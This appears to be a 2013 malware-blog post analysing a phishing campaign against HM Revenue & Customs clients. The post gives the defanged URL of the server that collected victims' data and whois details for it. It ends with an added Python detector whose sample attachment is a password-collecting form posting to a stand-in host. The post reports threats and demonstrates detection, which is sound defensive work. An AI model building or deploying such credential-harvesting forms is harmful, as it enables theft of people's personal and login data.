Anti-Malware Laboratory

Yet Another Malware Blog

Wednesday, August 28, 2013

Phishing targets HM Revenue & Customs clients

Posted on Wednesday, August 28, 2013 by Red Horse
A new phishing campaign targets HM Revenue & Customs clients. HM Revenue & Customs is an institution tied to the UK government and is responsible for the UK's taxes.

The phishing email contains the following:



It comes with a zip archive attachment that contains an HTML file named HM Revenue & Customs - Details.html.

Once the HTML file is opened, it shows this form:



The form looks legit since it uses images directly from the HMRC website.

When the form is submitted, all the information entered is sent to
h00p://nagios.net1.com.kh/nagiosweb/Lang.php


At the time of this writing, the site that the information is sent to has probably been shut down; it now returns a 404.

A simple whois query about the server shows:

domain: nagios.net1.com.kh
current ip: 202.131.87.67
nameserver: ns1.cambotech.com
nameserver: ns2.cambotech.com
reverse lookup domains based on ip: 
  nagios.net1.com.kh
  crm.netone.com.kh

The server is located in Cambodia.

No malware file was downloaded. Everything was plain and simple phishing and stealing.
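
The pattern described above (an HTML attachment that borrows images from the impersonated site but posts the form to an unrelated host) can be checked for automatically. The following is an added example, not code from the original post; the sample attachment and the host names in it are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a local HTML attachment that loads its images from the
# impersonated site but posts the form to an unrelated host (placeholder names).
SAMPLE_ATTACHMENT = """
<html><body>
<img src="https://www.tax-office.example/images/logo.png">
<form method="post" action="http://collector.example/submit.php">
  Name: <input type="text" name="fullname">
  Password: <input type="password" name="pw">
  <input type="submit" value="Submit">
</form>
</body></html>
"""

class FormAudit(HTMLParser):
    """Collect the hosts a page loads images from and posts forms to."""
    DATA_INPUTS = {"text", "password", "email", "tel", "number"}

    def __init__(self):
        super().__init__()
        self.post_hosts, self.image_hosts, self.data_fields = set(), set(), 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            host = urlparse(a.get("action") or "").hostname  # None if relative
            if host:
                self.post_hosts.add(host)
        elif tag == "img":
            host = urlparse(a.get("src") or "").hostname
            if host:
                self.image_hosts.add(host)
        elif tag == "input" and (a.get("type") or "text").lower() in self.DATA_INPUTS:
            self.data_fields += 1

def audit_attachment(html):
    """Flag forms that collect data and post it to a host serving none of the images."""
    p = FormAudit()
    p.feed(html)
    mismatched = p.post_hosts - p.image_hosts
    return {
        "post_hosts": sorted(p.post_hosts),
        "image_hosts": sorted(p.image_hosts),
        "mismatched": sorted(mismatched),
        "suspicious": bool(mismatched) and p.data_fields > 0,
    }

if __name__ == "__main__":
    print(audit_attachment(SAMPLE_ATTACHMENT))
```

A mail gateway or triage script could run this over HTML files extracted from archive attachments and queue the flagged ones for review.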
